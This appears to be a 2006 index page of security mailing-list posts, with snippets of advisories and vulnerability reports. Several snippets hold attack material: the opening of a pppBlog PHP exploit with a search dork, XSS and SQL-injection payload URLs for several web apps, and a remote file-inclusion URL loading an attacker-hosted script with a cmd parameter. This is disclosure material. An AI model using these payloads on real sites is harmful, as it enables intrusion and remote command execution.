[SECURITY] [DSA 1083-1] New motor packages fix arbitrary code execution
2006-05-31 joey infodrom org (Martin Schulze)

pppBlog <= 0.3.8 administrative credentials/system disclosure
2006-05-30 rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on <? echo "pppBlog <= 0.3.8 system disclosure exploit\r\n"; echo "by rgod rgod (at) autistici (dot) org\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: intext:\"Powered by pppblog\"\r\n\r\n"; /* works with: register_globals=On */ if ($argc

Re: [Info Disclosure] Diesel PHP Job Site Latest Version
2006-05-30 support dieselscripts com (1 replies)
Hello, To explain this to all visitors, the information is used to prevent any unauthorized copies from running on the web. All of the php developers that sell products online use this method or even more methods. Please stop making such a big deal out of this because it's our way of protec

Re: [Info Disclosure] Diesel PHP Job Site Latest Version
2006-05-31 GulfTech Security Research (security gulftech org)

Xss exploit in Chipmunk directory
2006-05-28 black code (black-cod3 hotmail com)
Xss exploit in Chipmunk directory
forum type : Chipmunk directory
bug found by : black-code
team : site-down
type : Xss
black-code: codes :
http://www.example.com/directory/index.php?catid=catid&start='><script>a lert(10)</script>
path to admin login: http://www.xxx.com/path/admin
All my resp

Open Searchable Image Catalogue: XSS and SQL Injection Vulnerabilities
2006-05-30 enji seclab tuwien ac at
===========================================================
Open Searchable Image Catalogue: XSS and SQL Injection Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory TUVSA-0605-001, May 30, 2006
==========================

[ GLSA 200605-17 ] libTIFF: Multiple vulnerabilities
2006-05-30 Stefan Cornelius (dercorny gentoo org)

[ MDKSA-2006:093 ] - Updated dia packages fix string format vulnerabilities.
2006-05-30 security mandriva com

[ GLSA 200605-16 ] CherryPy: Directory traversal vulnerability
2006-05-30 Stefan Cornelius (dercorny gentoo org)

Fire fox dos exploit
2006-05-30 co296 aol com (1 replies)

Backdoor in RelevantKnowledge adware (What are we fighting for?)
2006-05-30 3APA3A (3APA3A SECURITY NNOV RU)
Authors: YAG KOHHA (skyhole (at) gmail (dot) com), Lame
Title: Backdoor in RelevantKnowledge adware (What are we fighting for?)
Vendor: TMRG, Inc.
Description: RelevantKnowledge is an adware distributed with different shareware projects, e.g. Artisian Burner. RelevantKnowle

WBB<--v2.3.4"misc.php" SQL injection Vulnerability
2006-05-29 CrAzY CrAcKeR hotmail com
===================================
Discovery By: CrAzY CrAcKeR
Site: www.alshmokh.com
I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Breeeeh-LiNuX_rOOt-BoNy_m-rootshill
===================================
Example:- /misc.php?action=faq?sid=[SQL injection]
================

Bratpack Cross Site Scripting Vulnerability
2006-05-29 CrAzY CrAcKeR hotmail com
===================================
Discovery By: CrAzY CrAcKeR
Site: www.alshmokh.com
I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Breeeeh-LiNuX_rOOt-BoNy_m-rootshill
===================================
Example:- /projects.php?TaalId=[XSS]
==============================

NorthStudio Cross Site Scripting Vulnerability
2006-05-29 CrAzY CrAcKeR hotmail com
===================================
Discovery By: CrAzY CrAcKeR
Site: www.alshmokh.com
I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Breeeeh-LiNuX_rOOt-BoNy_m-rootshill
===================================
Example:- /rpt_menu.php?mnuId=[XSS]
Search:- Powered by northStudio

phpMyDesktop|arcade 1.0 FINAL Code Execution
2006-05-29 darkgod xsf gmail com
phpMyDesktop|arcade 1.0 FINAL Code Execution Exploit
found-by: darkgod (darkgod.xsf (at) gmail (dot) com)
links: criticalsecurity.NET, hackthissite.org, hacbloc.org
video-@: http://dgod.dajoob.com/videos/phpmydesktoparcade.rar
phpMyDesktop|arcade is a php-based 'bridge' between a game and message b

Re: On the Recent PGP and Truecrypt Posting
2006-05-29 Jon Callas (jon pgp com)
> From what I understand about this issue. It seems the issue is
> that users are not understanding how the system works. This would
> then be a usability issue where the user's idea of how the system
> works and the actual way in which it works is very different. PGP
> has had issues wit

4nNukeWare<--V 0.91 SQL Injection exploits
2006-05-29 CrAzY CrAcKeR hotmail com
===================================
Discovery By: CrAzY CrAcKeR
Site: www.alshmokh.com
I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Breeeeh-Rootshil-LiNuX_rOOt-BoNy_m
===================================
Example:- modules.php?name=4nForum&file=viewthread&tid=[SQL]
=======

Jiwa Financials - Reporting allows execution of arbitrary reports as SQL user with full permissions.
2006-05-30 Robert misait com
forum type : Support cards v1
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploit :
http://www.example.com/support/include/open_form.php?include_dir=http://
ursite/evilscript.txt?cmd=